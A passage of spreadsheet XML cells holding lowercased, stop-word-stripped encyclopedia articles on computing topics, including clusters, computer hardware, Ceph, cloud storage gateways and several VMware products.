parallel virtual machine (pvm) message passing. university california, berkeley network workstations (now) system gathers cluster data stores database, system parmon, developed india, allows visually observing managing large clusters.application checkpointing used restore given state system node fails long multi-node computation. this essential large clusters, given number nodes increases, likelihood node failure heavy computational loads. checkpointing restore system stable state processing resume without needing recompute results. implementations linux world supports various cluster software; application clustering, distcc, mpich. linux virtual server, linux-ha director-based clusters allow incoming requests services distributed across multiple cluster nodes. mosix, linuxpmi, kerrighed, openssi full-blown clusters integrated kernel provide automatic process migration among homogeneous nodes. openssi, openmosix kerrighed single-system image implementations. microsoft windows computer cluster server 2003 based windows server platform provides pieces high-performance computing like scheduler, msmpi library management tools. glite middleware technologies created enabling grids e-science (egee) project. slurm also used schedule manage largest supercomputer clusters (see top500 list). other approaches although computer clusters permanent fixtures, attempts flash computing made build short-lived clusters specific computations. however, larger-scale volunteer computing systems boinc-based systems followers. also references further reading baker, mark; 2001). "cluster computing white paper". arxiv:cs/0004014. marcus, evan; stern, (2000-02-14). blueprints high availability: designing resilient distributed systems. john wiley sons. isbn 978-0-471-35601-1. pfister, greg (1998). search clusters. prentice hall. isbn 978-0-13-899709-0. buyya, rajkumar, (1999). high performance cluster computing: architectures systems. vol. usa: prentice hall. isbn 978-0-13-013784-5. buyya, rajkumar, (1999). high performance cluster computing: architectures systems. vol. usa: prentice hall. isbn 978-0-13-013785-2. external links ieee technical committee scalable computing (tcsc) reliable scalable cluster technology, tivoli system automation wiki large-scale cluster management google borg, april 2015, abhishek verma, luis pedrosa, madhukar korupolu, david oppenheimer, eric tune john wilkes</t>
  </si>
  <si>
    <t>Typed assembly language</t>
  </si>
  <si>
    <t>computer science, typed assembly language (tal) assembly language extended include method annotating datatype value manipulated code. these annotations used program (type checker) processes assembly language code order analyse behave executed. specifically, type checker used prove type safety code meets criteria appropriate type system. typed assembly languages usually include high-level memory management system based garbage collection. typed assembly language suitably expressive type system used enable safe execution untrusted code without using intermediate representation like bytecode, allowing features similar currently provided virtual machine environments like java .net. also proof-carrying code further reading greg morrisett. "typed assembly language" advanced topics types programming languages. editor: benjamin pierce. external links talx86, research project cornell university implemented typed assembler intel ia-32 architecture.</t>
  </si>
  <si>
    <t>Computer hardware</t>
  </si>
  <si>
    <t>computer hardware includes physical parts computer, case, central processing unit (cpu), random access memory (ram), monitor, mouse, keyboard, computer data storage, graphics card, sound card, speakers motherboard.by contrast, software instructions stored hardware. hardware so-termed "hard" rigid respect changes, whereas software "soft" easy change. hardware typically directed software execute command instruction. combination hardware software forms usable computing system, although systems exist hardware. neumann architecture template modern computers neumann architecture, detailed 1945 paper hungarian mathematician john neumann. this describes design architecture electronic digital computer subdivisions processing unit consisting arithmetic logic unit processor registers, control unit containing instruction register program counter, memory store data instructions, external mass storage, input output mechanisms. meaning term evolved mean stored-program computer instruction fetch data operation cannot occur time share common bus. this referred neumann bottleneck often limits performance system. types computer systems personal computer personal computer common types computer versatility relatively price. desktop personal computers monitor, keyboard, mouse, computer case. computer case holds motherboard, fixed removable disk drives data storage, power supply, contain peripheral devices modems network interfaces. some models desktop computers integrated monitor keyboard case processor power supply. separating elements allows user arrange components pleasing, comfortable array, cost managing power data cables them. laptops designed portability operate similarly desktop pcs. they lower-power reduced size components, lower performance similarly priced desktop computer. laptops contain keyboard, display, processor case. monitor folding upper cover case closed transportation, protect screen keyboard. instead mouse, laptops touchpad pointing stick. tablets portable computers touch screen primary input device. tablets generally weigh less smaller laptops. some tablets include fold-out keyboards, offer connections separate external keyboards. some models laptop computers detachable keyboard, allows system configured touch-screen tablet. they sometimes called "2-in-1 detachable laptops" "tablet-laptop hybrids". case computer case encloses components system. provides mechanical support protection internal elements motherboard, disk drives, power supplies, controls directs flow cooling internal components. case also part system control electromagnetic interference radiated computer protects internal parts electrostatic discharge. large tower cases provide space multiple disk drives peripherals usually stand floor, desktop cases provide less expansion room. all-in-one style designs include video display built case. portable laptop computers require cases provide impact protection unit. hobbyists decorate cases colored lights, paint, features, activity called case modding. power supply power supply unit (psu) converts alternating current (ac) electric power low-voltage direct current (dc) power computer. laptops built-in rechargeable battery. typically uses switched-mode power supply (smps), power mosfets (power metal–oxide–semiconductor field-effect transistors) used converters regulator circuits smps. motherboard motherboard main component computer. board integrated circuitry connects parts computer including cpu, ram, disk drives (cd, dvd, hard disk, others) well peripherals connected ports expansion slots. integrated circuit (ic) chips computer typically contain billions tiny metal–oxide–semiconductor field-effect transistors (mosfets).components directly attached part motherboard include: (central processing unit), performs calculations enable computer function, referred brain computer. takes program instructions random-access memory (ram), interprets processes sends back results relevant components carry instructions. microprocessor, fabricated metal–oxide–semiconductor (mos) integrated circuit (ic) chip. usually cooled heatsink fan, water-cooling system. many newer cpus include on-die graphics processing unit (gpu). clock speed governs fast executes instructions measured ghz; typical values ghz. many modern computers option overclock enhances performance expense greater thermal output thus need improved cooling. chipset, includes north bridge, mediates communication components system, including main memory; well south bridge, connected north bridge, supports auxiliary interfaces buses; and, finally, super chip, connected south bridge, supports slowest legacy components like serial ports, hardware monitoring control. random-access memory (ram), stores code data actively accessed cpu. example, browser opened computer takes memory; stored browser closed. typically type dynamic (dram), synchronous dram (sdram), memory chips store data memory cells consisting mosfets capacitors. usually comes dual in-line memory modules (dimms) sizes 2gb, 4gb, 8gb, much larger. read-only memory (rom), stores bios runs computer powered otherwise begins execution, process known bootstrapping, "booting" "booting up". typically nonvolatile bios memory chip, stores data floating-gate mosfet memory cells. bios (basic input output system) includes boot firmware power management firmware. newer motherboards unified extensible firmware interface (uefi) instead bios. buses connect various internal components expand cards graphics sound. cmos (complementary mos) battery, powers cmos memory date time bios chip. this battery generally watch battery. video card (also known graphics card), processes computer graphics. more powerful graphics cards better suited handle strenuous tasks, playing intensive video games running computer graphics software. video card contains graphics processing unit (gpu) video memory (typically type sdram), fabricated integrated circuit (mos chips. power mosfets make voltage regulator module (vrm), controls much voltage hardware components receive. expansion cards expansion card computing printed circuit board inserted expansion slot computer motherboard backplane functionality computer system expansion bus. expansion cards used obtain expand features offered motherboard. storage devices storage device computing hardware digital media used storing, porting extracting data files objects. hold store information temporarily permanently internal external computer, server similar computing device. data storage core function fundamental component computers. fixed media data stored computer using variety media. hard disk drives (hdds) found virtually older computers, high capacity cost, solid-state drives (ssds) faster power efficient, although currently expensive hard drives terms dollar gigabyte, often found personal computers built post-2007. ssds flash memory, stores data memory chips consisting floating-gate mosfet memory cells. some systems disk array controller greater performance reliability. removable media transfer data computers, external flash memory device (such memory card flash drive) optical disc (such cd-rom, dvd-rom bd-rom) used. their usefulness depends readable systems; majority machines optical disk drive (odd), virtually least universal serial (usb) port. additionally, sticks typically pre-formatted fat32 file system, widely supported across operating systems. input output peripherals input output devices typically housed externally main computer chassis. following either standard common many computer systems. input device input devices allow user enter information system, control operation. most personal computers mouse keyboard, laptop systems typically touchpad instead mouse. other input devices include webcams, microphones, joysticks, image scanners. output device output devices designed around senses human beings. example, monitors display text read, speakers produce sound heard. such devices also could include printers braille embosser. mainframe computer mainframe computer much larger computer typically fills room cost many hundreds thousands times much personal computer. they designed perform large numbers calculations governments large enterprises. departmental computing 1960s 1970s, departments started cheaper dedicated systems specific purposes like process control laboratory automation. minicomputer, colloquially mini, class smaller computers developed mid-1960s sold much less mainframe mid-size computers direct competitors. supercomputer supercomputer superficially similar mainframe instead intended extremely demanding computational tasks. november 2021, fastest supercomputer top500 supercomputer list fugaku, japan, linpack benchmark score pflops, superseding second fastest, summit, united states, around pflops. term supercomputer refer specific technology. rather indicates fastest computations available given time. mid-2011, fastest supercomputers boasted speeds exceeding petaflop, quadrillion (10^15 1,000 trillion) floating-point operations second. supercomputers fast extremely costly, generally used large organizations execute computationally demanding tasks involving large data sets. supercomputers typically military scientific applications. although costly, also used commercial applications huge amounts data must analyzed. example, large banks employ supercomputers calculate risks returns various investment strategies, healthcare organizations analyze giant databases patient data determine optimal treatments various diseases problems incurring country. hardware upgrade when using computer hardware, upgrade means adding additional hardware computer improves performance, increases capacity, adds features. example, user could perform hardware upgrade replace hard drive faster solid state drive (ssd) boost performance. user also install random access memory (ram) computer store additional temporary data, retrieve data faster rate. user expansion card fully devices, could upgrade graphics processing unit (gpu) cleaner, advanced graphics, monitors. performing hardware upgrades necessary aged computers meet new, updated program's system requirements. sales global revenue computer hardware 2016 reached billion euros. recycling because computer parts contain hazardous materials, growing movement recycle outdated parts. computer hardware contain dangerous chemicals lead, mercury, nickel, cadmium. according e-wastes harmful effect environment unless disposed properly. making hardware requires energy, recycling parts reduce pollution, water pollution, well greenhouse emissions. disposing unauthorized computer equipment fact illegal. legislation makes mandatory recycle computers government approved facilities. recycling computer made easier taking certain reusable parts. example, ram, drive, graphics card, hard drive ssd, similar removable parts reused. many materials used computer hardware recovered recycling future production. reuse tin, silicon, iron, aluminium, variety plastics present bulk computers electronics reduce costs constructing systems. components frequently contain copper, gold, tantalum, silver, platinum, palladium, lead well valuable materials suitable reclamation. toxic computer components central processing unit contains many toxic materials. contains lead chromium metal plates. resistors, semi-conductors, infrared detectors, stabilizers, cables, wires contain cadmium. circuit boards computer contain mercury, chromium. when types materials, chemicals disposed improperly become hazardous environment. environmental effects according united states environmental protection agency around e-waste actually recycled. when e-waste byproducts leach groundwater, burned, mishandled recycling, causes harm. health problems associated toxins include impaired mental development, cancer, damage lungs, liver, kidneys. that's even wires recycled. different companies different techniques recycle wire. popular grinder separates copper wires plastic/rubber casing. when processes done different piles left; containing copper powder, containing plastic/rubber pieces. computer monitors, mice, keyboards similar recycled. example, first, parts taken apart inner parts separated placed bin.computer components contain many toxic substances, like dioxins, polychlorinated biphenyls (pcbs), cadmium, chromium, radioactive isotopes mercury. typical computer monitor contain lead weight, much lead glass cathode tube (crt). typical inch computer monitor contain pounds lead monitors estimated pounds lead. circuit boards contain considerable quantities lead-tin solders likely leach groundwater create pollution incineration. landfills, lead content levels e-waste. processing (e.g. incineration acid treatments) required reclaim precious substances release, generate, synthesize toxic byproducts. recycling computer hardware considered environmentally friendly prevents hazardous waste, including heavy metals carcinogens, entering atmosphere, landfill waterways. while electronics consist small fraction total waste generated, dangerous. there stringent legislation designed enforce encourage sustainable disposal appliances, notable waste electrical electronic equipment directive european union united states national computer recycling act. efforts minimizing computer hardware waste computer hardware contain wide number metals inside, united states environmental protection agency (epa) encourages collection recycling computer hardware. "e-cycling", recycling computer hardware, refers donation, reuse, shredding general collection used electronics. generically, term refers process collecting, brokering, disassembling, repairing recycling components metals contained used discarded electronic equipment, otherwise known electronic waste (e-waste). "e-cyclable" items include, limited televisions, computers, microwave ovens, vacuum cleaners, telephones cellular phones, stereos, vcrs dvds anything cord, light takes kind battery.recycling computer made easier national services, dell apple. both companies take back computer make make. otherwise computer donated computer international organization recycles refurbishes computers hospitals, schools, universities, etc. also references external links media related computer hardware wikimedia commons computer hardware wikibooks learning materials related computer hardware wikiversity</t>
  </si>
  <si>
    <t>Computer lock</t>
  </si>
  <si>
    <t>computer lock physical lock computer accompanying used access control anti-theft system. history 1980s early 1990s, personal computers compatibles included tubular tumbler lock computer's casing performing security function varied manufacturer. instances, lock would prevent case opened inhibit theft modification internal components. cases, lock used forbid unauthorized access computer disabling power supply, hard drive, keyboard. other early personal computer locks include maclocks, introduced compulocks 1986.built-in computer locks access control phased computer manufacturers 1990s operating systems software incorporated user profiles passwords, computer locks prevent theft still use, commonly form kensington locks attach cables laptops small desktops effort prevent taken. also physical security computer access control data security references</t>
  </si>
  <si>
    <t>Computer network</t>
  </si>
  <si>
    <t>Compensating transaction</t>
  </si>
  <si>
    <t>execution business process consists transactions. each transaction consist several individual operations yet, whole, moves system consistent states. there groups systems compensating transaction applied: context database often easily achieved using transactions commit/rollback mechanism. compensating transaction logic could implemented additional database supporting commit/rollback. case, decrease business transaction granularity. systems without commit/rollback mechanism available, undo failed transaction compensating transaction, bring system back initial state. typically, workaround implemented manually cannot guarantee system always ends consistent state. system designer need consider happens compensating transaction also fails. compensating transactions also used case transaction long lived (commonly called saga transactions), instance business process requiring user input. cases, data committed permanent storage, subsequently need rolled back, perhaps user opting cancel operation. unlike conventional rollbacks, specific business logic typically required roll back long lived transaction restore system original state. this type transaction differs distributed transactions (often implemented using two-phase-commit protocol), although types transactions result multiple data stores updated, compensating transactions allows updates span long period time. compensating transactions often designed services participate execution business processes part service-oriented architecture solution. also business process execution language references</t>
  </si>
  <si>
    <t>CloudEndure</t>
  </si>
  <si>
    <t>cloudendure cloud computing company develops business continuity software disaster recovery, continuous backup, live migration. cloudendure headquartered united states israel. history cloudendure founded 2012 ofer gadish (ceo), shai (cro), ofir ehrlich r&amp;d), leonid feinberg product). founders previously established acceloweb, acquired limelight networks 2011.cloudendure raised total $18.2 million private investors companies dell emc, vmware, mitsui, infosys, magma venture partners.awards cloudendure include 2017 emerging vendors award storage startups 2016 gartner cool vendor award.cloudendure products integrated software several partner company services, including integration google cloud migration service integrations cisco systems cloudcenter disaster recovery migration sungard availability services cloud recovery. amazon made offer purchase cloudendure january 2019. between $200 $250 million negotiated price. they outbid google acquired company january 2019. products cloudendure disaster recovery performs continuous block-level replication saves dormant copy target infrastructure, uses smaller percentage compute, storage, memory primary site; leads minimal rtos (recovery time objective) rpos (recovery point objective) spun disaster.the company offers tiers disaster recovery, well continuous backup live migration products.cloudendure's software service (saas) application-agnostic replicate workloads physical, virtual, cloud-based infrastructure variety target sites, including amazon services (aws), google cloud platform (gcp), microsoft azure, vmware. patents licensing cloudendure ltd. holds pending) seven patents including: "20140279915a1".{{cite web}}: maint: url-status (link) system method maintaining copy cloud-based computing environment restoration. "20150249708a1".{{cite web}}: maint: url-status (link) system method asynchronous replication storage computing environment. "20150256510a1".{{cite web}}: maint: url-status (link) system method name resolution replicated components computing environments. "20170093971a1".{{cite web}}: maint: url-status (link) system method orchestrating replicated components replicated cloud-based computing environment. "20170192859a1".{{cite web}}: maint: url-status (link) system method restoring original machines replicated machines secondary computing environment. "20170111449a1".{{cite web}}: maint: url-status (link) synchronization order access instructions primary computing environment replicated computing environment. "20180181310a1".{{cite web}}: maint: url-status (link) system method disk identification cloud-based computing environment. also disaster recovery disaster recovery plan (drp) business continuity recovery time objective (rto) recovery point objective (rpo) continuous data protection references</t>
  </si>
  <si>
    <t>Cloud-Native Network Function</t>
  </si>
  <si>
    <t>cloud-native network function (cnf) software-implementation network function, traditionally performed physical device, runs inside linux containers (typically orchestrated kubernetes). features differ cnfs vnfs (virtualized network functions), components network function virtualization, approach orchestration. etsi standards, cloud-native network functions particular type virtualized network functions orchestrated vnfs, i.e. using etsi mano architecture technology-agnostic descriptors (e.g. tosca, yang). case, upper layers etsi mano architecture (i.e. nfvo vnfm) cooperate container infrastructure service management (cism) function typically implemented using cloud-native orchestration solutions (e.g. kubernetes). characteristics cloud-native functions are: containerized microservices communicate each-other standardized restful apis small performance footprint, ability scale horizontally independence guest operating system, since cnfs operate containers lifecycle manageable kubernetes, using container images registries docker, container runtime. relation network function virtualization these characteristics address many common issues found first generation vnfs, incorporating many innovations deployed commonly internet infrastructure. these include auto-scaling, supporting continuous delivery/devops deployment model, efficiency gains sharing common services across platforms. through service discovery orchestration, system based cnfs resilient node failure. specification criteria classify characterize cloud native implementations found etsi nfv-eve 011. cloud native computing foundation linux foundation backed cloud native computing foundation project actively supporting companies contributing open-source projects like kubernetes prometheus, upon cloud native network functions based cncf project also created testbed, order facilitate common test-ground various cloud-native network functions. references cloud native computing foundation, (http//www.cncf.io)</t>
  </si>
  <si>
    <t>Cloud storage gateway</t>
  </si>
  <si>
    <t>cloud storage gateway hybrid cloud storage device, implemented hardware software, resides customer premises translates cloud storage apis soap rest block-based storage protocols iscsi fibre channel file-based interfaces smb.according 2011 report gartner group, cloud gateways expected increase cloud storage lowering monthly charges eliminating concern data security. technology features modern applications (aka "cloud native applications") network attached storage means rest soap hypertext transfer protocol protocol layer. related storage provided arrays offer object storage. classic applications network attached storage means network file system nfs, iscsi server message block smb. make advantages object storage, existing applications need rewritten applications must object storage aware, case default. this problem addressed cloud storage gateways. they offer object storage classic native storage protocols like network file system server message block (and offer iscsi well). rule thumb, classic applications cloud native object storage used cloud storage gateways. functionality enterprise infrastructures mainly used linux systems whereas windows systems using smb. object storage needs data form objects rather files. cloud storage gateways mandatory cache incoming files destage object storage later step. time destaging subject gateway policy engine allows functions like pinning bind specific files cache destage mirroring purpose content based destaging move files specific characteristics object storage e.g. files multi-cloud mirroring mirror files different object stores least recently fill local cache maximum, move files object storage delete files cache algorithm encrypt prior destage files encrypted cloud storage gateway destaged object storage encrypted form compress and/or dedupliation prior destage files deduplicated and/or compressed prior destaging backup data native backup formatcombinations functions usual. default sorting schematics spanning retrieval interface generally rely zero-fault content processing, carries obvious requirement functions synchronized. extensions nearly object storage gateways support amazon protocol quasi-standard. some offer well microsoft azure blob, google storage, openstack swift. most gateways support public cloud storage e.g. amazon microsoft object store dropbox file drive store, well vendors support private cloud storage well including prem storage. deployment methods there multiple variants deploy gateways vendors support well different variants product line: bare metal hardware appliance software appliance supporting different hypervisors software operating system fuse basedsoftware appliances well fuse-based gateways installed public cloud infrastructures. advantages cloud storage gateways avoid need change existing applications providing standard interface. additionally, users used existing protocols like nfs. they make cloud storage advantage still using existing infrastructures (including e.g. active directory, ldap integration, fileshare functions etc.). while cloud storage gateways initially covered niche only, attraction multi-cloud technologies. example: possible cloud storage gateway form software appliance public private cloud infrastructure offering docker volume drivers enable containers automatic provisioning storage used containers consistent form. they using hypervisors disks cache only, destage data least recently used algorithm underlying cloud storage. facto standard object storage amazon popularity capacity installed object storage. every object storage vendor (and offer amazon storage even real "standard" api: every vendor little different implementing seen different cloud storage gateway vendors supporting "specific" apis different object storage vendors). since 2018, increasing number cloud storage gateways hide complexity offering northbound networking technologies, southbound relates storage used gateway, whereas northbound storage provided gateway). such, utilize richer implementation northbound southbound supports. disadvantages using cloud storage gateways complexity object storage hidden, also hides advantages object storage: ability horizontal scaling ability high efficient metadata data content extended worm archiving capabilities object storageas applications change cloud-aware applications (aka called cloud native applications), cloud storage gateways change multiprotocol gateways multi-cloud gateways, providing access multiple cloud providers well multiple southbound protocols relays different clouds. market 2020 cloud storage gateway market valued billion predicted reach billion 2026, based report market research firm mordor intelligence. also cloud computing ctera networks panzura nasuni references</t>
  </si>
  <si>
    <t>Centurion guard</t>
  </si>
  <si>
    <t>centurion guard hardware software based security product developed centurion technologies released 1996. there many different releases versions product, many distributed bill melinda gates foundation computers donated libraries. operating system compatibility microsoft windows microsoft windows vista microsoft windows references</t>
  </si>
  <si>
    <t>Ceph (software)</t>
  </si>
  <si>
    <t>ceph (pronounced open-source software-defined storage platform implements object storage single distributed computer cluster provides 3-in-1 interfaces object-, block- file-level storage. ceph aims primarily completely distributed operation without single point failure, scalability exabyte level, freely available. since version ceph rely filesystems directly manage hdds ssds storage backend bluestore completely self reliantly expose posix filesystem. ceph replicates data makes fault-tolerant, using commodity hardware ethernet requiring specific hardware support. ceph’s system offers disaster recovery data redundancy techniques replication, erasure coding, snapshots storage cloning. result design, system self-healing self-managing, aiming minimize administration time costs. way, administrators single, consolidated system avoids silos collects storage within common management framework. ceph consolidates several storage cases improves resource utilization. also lets organization deploy servers needed. design ceph employs five distinct kinds daemons: cluster monitors (ceph-mon) keep track active failed cluster nodes, cluster configuration, information data placement global cluster state. object storage devices (ceph-osd) direct, journaled disk storage (named bluestore, since v12.x release replaces filestore would filesystem) metadata servers (ceph-mds) cache broker access inodes directories inside cephfs filesystem. http gateways (ceph-rgw) expose object storage layer interface compatible amazon openstack swift apis managers (ceph-mgr) perform cluster monitoring, bookkeeping, maintenance tasks, interface external monitoring systems management (e.g. balancer, dashboard, prometheus, zabbix plugin)all fully distributed, servers. clients different needs directly interact different subsets them.ceph striping individual files across multiple nodes achieve higher throughput, similar raid0 stripes partitions across multiple hard drives. adaptive load balancing supported whereby frequently accessed objects replicated nodes. september 2017, bluestore default recommended storage type production environments, ceph's storage implementation providing better latency configurability filestore backend, avoiding shortcomings filesystem based storage involving additional processing caching layers. filestore backend still considered useful stable; used recommended underlying filesystem type production environments, btrfs recommended non-production environments. ext4 filesystems recommended resulting limitations maximum rados objects length. even using bluestore, used small partition metadata. object storage ceph implements distributed object storage bluestore. rados gateway (ceph-rgw) expose object storage layer interface compatible amazon these often capacitive disks associated ceph's object storage cases: data (datalake), backup archives, iot, media, video recording, etc. ceph's software libraries provide client applications direct access reliable autonomic distributed object store (rados) object-based storage system, also provide foundation ceph's features, including rados block device (rbd), rados gateway, ceph file system. way, administrators maintain storage devices unified system, makes easier replicate protect data. "librados" software libraries provide access c++, java, php, python. rados gateway also exposes object store restful interface present native amazon openstack swift apis. block storage ceph's object storage system allows users mount ceph thin-provisioned block device. when application writes data ceph using block device, ceph automatically stripes replicates data across cluster. ceph's rados block device (rbd) also integrates kernel-based virtual machines (kvms). these often fast disks (nvme, ssd) associated ceph's block storage cases, including databases, virtual machines, data analytics, artificial intelligence, machine learning. "ceph-rbd" interfaces ceph object storage system provides librados interface cephfs file system, stores block device images objects. since built librados, inherits librados's abilities, including read-only snapshots revert snapshot. striping images across cluster, ceph improves read access performance large block device images. "ceph-iscsi" gateway enables access distributed, highly available block storage microsoft windows vmware vsphere server client capable speaking iscsi protocol. using ceph-iscsi iscsi gateway hosts, ceph images become available logical units (lus) associated iscsi targets, accessed optionally load-balanced, highly available fashion. since ceph-iscsi configuration stored ceph rados object store, ceph-iscsi gateway hosts inherently without persistent state thus replaced, augmented, reduced will. result, ceph storage enables customers truly distributed, highly-available, resilient, self-healing enterprise storage technology commodity hardware entirely open source platform. block device virtualized, providing block storage virtual machines, virtualization platforms openshift, openstack, kubernetes, opennebula, ganeti, apache cloudstack proxmox virtual environment. file system storage ceph's file system (cephfs) runs object storage system provides object storage block device interfaces. ceph metadata server cluster provides service maps directories file names file system objects stored within rados clusters. metadata server cluster expand contract, rebalance file system dynamically distribute data evenly among cluster hosts. this ensures high performance prevents heavy loads specific hosts within cluster. clients mount posix-compatible file system using linux kernel client. older fuse-based client also available. servers regular unix daemons. ceph's file storage often associated collection, messaging, file storage. history ceph initially created sage weil doctoral dissertation, advised professor scott brandt jack baskin school engineering, university california, santa cruz (ucsc), sponsored advanced simulation computing program (asc), including alamos national laboratory (lanl), sandia national laboratories (snl), lawrence livermore national laboratory (llnl). first line code ended part ceph written sage weil 2004 summer internship llnl, working scalable filesystem metadata management (known today ceph's mds). 2005, part summer project initiated scott brandt carlos maltzahn, sage weil created fully functional file system prototype adopted name ceph. ceph made debut sage weil giving presentations november 2006, usenix osdi 2006 another sc'06.after graduation autumn 2007, weil continued work ceph full-time, core development team expanded include yehuda sadeh weinraub gregory farnum. march 2010, linus torvalds merged ceph client linux kernel version 2.6.34 released 2010. 2012, weil created inktank storage professional services support ceph.in april 2014, purchased inktank, bringing majority ceph development in-house make production version enterprises support (hotline) continuous maintenance (new versions).in october 2015, ceph community advisory board formed assist community driving direction open source software-defined storage technology. charter advisory board includes ceph community members global organizations committed ceph project, including individuals hat, intel, canonical, cern, cisco, fujitsu, sandisk, suse.in november 2018, linux foundation launched ceph foundation successor ceph community advisory board. founding members ceph foundation included amihan, canonical, china mobile, digitalocean, intel, ovh, prophetstor data services, hat, softiron, suse, western digital, xsky data technology, zte.in march 2021, suse discontinued enterprise storage product incorporating ceph favor longhorn. former enterprise storage website updated stating "suse refocused storage efforts around serving strategic suse enterprise storage customers longer actively selling suse enterprise storage." release history etymology name "ceph" abbreviation "cephalopod", class molluscs includes octopus. name (emphasized logo) suggests highly parallel behavior octopus chosen associate file system "sammy", banana slug mascot ucsc. both cephalopods banana slugs molluscs. also references further reading jones (2010-05-04). "ceph: linux petabyte-scale distributed file system". developerworks linux technical library. retrieved 2010-05-06. jeffrey layton (2010-04-20). "ceph: distributed file system creature object lagoon". linux magazine. retrieved 2010-04-24. carlos maltzahn; esteban molina-estolano; amandeep khurana; alex nelson; scott brandt; sage weil (august 2010). "ceph scalable alternative hadoop distributed file system". ;login:. (4). retrieved 2012-03-09. martin loschwitz (april 2012). "the rados object store ceph filesystem". admin magazine. retrieved 2012-04-25. external links official website</t>
  </si>
  <si>
    <t>VMware ThinApp</t>
  </si>
  <si>
    <t>vmware thinapp (formerly thinstall) application virtualization portable application creator suite vmware package conventional windows applications become portable applications running another operating system. according vmware, product success rate 90–95 packaging applications. history thinapp (previously known thinstall) originally developed jitit inc. acquired vmware january 2008. vmware later used code name vmware project north star product beta. june 2008, vmware announced final name product going vmware thinapp. trial version thinstall initially available corporations, vmware offered public trial version. technology vmware thinapp provides application virtualization. thinapp able execute applications without installed traditional sense virtualizing resources environment variables, files windows registry keys. virtual environment presented client merged view underlying physical virtual resources, thereby allowing virtualization layer fool application thinking running fully installed. thinapp pre-installed components require installation device drivers allowing applications flash drives network shares without ever requiring administrator rights. thinapp converts standard application installers .msi files self-contained files includes everything required run. also able scan system application's installation create portable executable based upon changes made systems files registry. unlike self-extracting files, thinapp extract files disk require system registry changes order applications. thinapp versions released 5.2.3 drop support windows windows server 2003 later. editions "basic" version thinapp "vmware thinapp starter edition", offered free purchase vmware workstation, "advanced" version "vmware thinapp enterprise edition", adds support appsync updating, active directory integration allows usage multiple users (both thinapp packager thinapp client). also microsoft app-v turbo (software) software appliance windows sandboxie portable application creators references external links official website</t>
  </si>
  <si>
    <t>VMware Server</t>
  </si>
  <si>
    <t>vmware server (formerly vmware server) discontinued free-of-charge virtualization-software server suite developed supplied vmware, inc. vmware server fewer features vmware esx, software available purchase, create, edit, play virtual machines. uses client–server model, allowing remote access virtual machines, cost graphical performance (and support). virtual machines created vmware products microsoft virtual vmware server preserve revert single snapshot copy separate virtual machine within vmware server environment. software specific interface cloning virtual machines, unlike vmware workstation. vmware server largely replaced "shared virtual machines" feature, introduced vmware workstation onwards. naming former name server allegedly stands ground storm early code name project. versions vmware server vmware released version server july 2006, replacing discontinued vmware server product-line. vmware continued develop vmware server 1.0.x series, issuing maintenance release (version 1.0.10) october 2009. vmware server vmware server runs several server-class host operating systems, including different versions microsoft windows server 2000, 2003, 2008, mainly enterprise-class linuxes. manual explicitly states: "you must windows server operating system". product also runs windows enterprise edition. server uses web-based user-interface, "vmware infrastructure access", instead gui. interfaces, vmware server vmware vcenter tomcat server, vmware vcenter based tomcat 2.5. part product, vmware host agent service (also carried vmware workstation server today) allows remote access vmware server functionality.vmware server supports microsoft shadow copy service. (microsoft virtual server 2005 also supports shadow copy.) virtual machines support service backed without stopping. vmware server discontinued january 2010; general support ended june 2011. also virtual appliance virtual machine platform virtualization virtualization virtual disk image references external links vmware server end-user license</t>
  </si>
  <si>
    <t>VMware Infrastructure</t>
  </si>
  <si>
    <t>vmware infrastructure collection virtualization products vmware division dell technologies). virtualization abstraction layer decouples hardware operating systems. vmware infrastructure suite allows enterprises optimize manage infrastructure virtualization integrated offering. core product families vsphere, vsan on-premises virtualization. vmware cloud foundation (vcf) infrastructure platform hybrid cloud management. vmware infrastructure suite designed span large range deployment types provide maximum flexibility scalability. components suite included: vmware server version vmware esxi version vmware vcenter version (formally vmware virtualcenter) virtual (which allows guest operating system "see" four cpus virtual machine).users supplement software bundle purchasing optional products, vmotion, well distributed services high availability (ha), distributed resource scheduler (drs), consolidated backup. vmware inc. released vmware infrastructure june 2006. suite came three "editions": starter, standard enterprise. limitations known limitations vmware infrastructure constrain design data centers:as june 2008 limitations vmware infrastructure version included following: guest system maximum ram: number guest cpus: number hosts cluster: number hosts cluster: size server: number hosts managed virtual center server: number virtual machines managed virtual center server: 2000no limitations were, example, volume size scsi controllers virtual machine; maximum number remote consoles virtual machine also possible connect fibre channel tape-drives, hinders ability backups using drives. renaming vmware renamed product vmware vsphere release marketed cloud computing. also comparison platform virtualization software virtual appliance vmware vmfs, vmware file system virtualization references external links official website vmware infrastructure documentation vmware infrastructure demo youtube</t>
  </si>
  <si>
    <t>VMware Fusion</t>
  </si>
  <si>
    <t>vmware fusion software hypervisor developed vmware macintosh computers. vmware fusion allows intel-based macs virtual machines guest operating systems—such microsoft windows, linux, netware, solaris, macos—within host macos operating system. overview vmware fusion, uses combination paravirtualization hardware virtualization made possible transition intel processors 2006, marked vmware's first entry macintosh-based virtualization. vmware fusion uses intel present intel core microarchitecture platform. much underlying technology vmware fusion inherited vmware products, vmware workstation, allowing vmware fusion offer features 64-bit support.vmware fusion released august 2007, exactly year announced.vmware fusion hundreds operating systems provided user, including many older versions macos, gives users older application software longer current version macos, 32-bit apps rosetta (powerpc) apps. system requirements most apple macs launched 2012 later vmware fusion macs launched 2011 later vmware fusion x86-64 capable intel vmware fusion (minimum) free disk space free disk space virtual machine recommended) macos catalina later vmware fusion 10.11 capitan later vmware fusion 10.9 mavericks later vmware fusion operating system installation media virtual machines optional: nvidia geforce 8600m, radeon 2600 better graphics windows aero support also desktop virtualization hardware virtualization vmware workstation vmware workstation player references further reading external links official website</t>
  </si>
  <si>
    <t>VMmark</t>
  </si>
  <si>
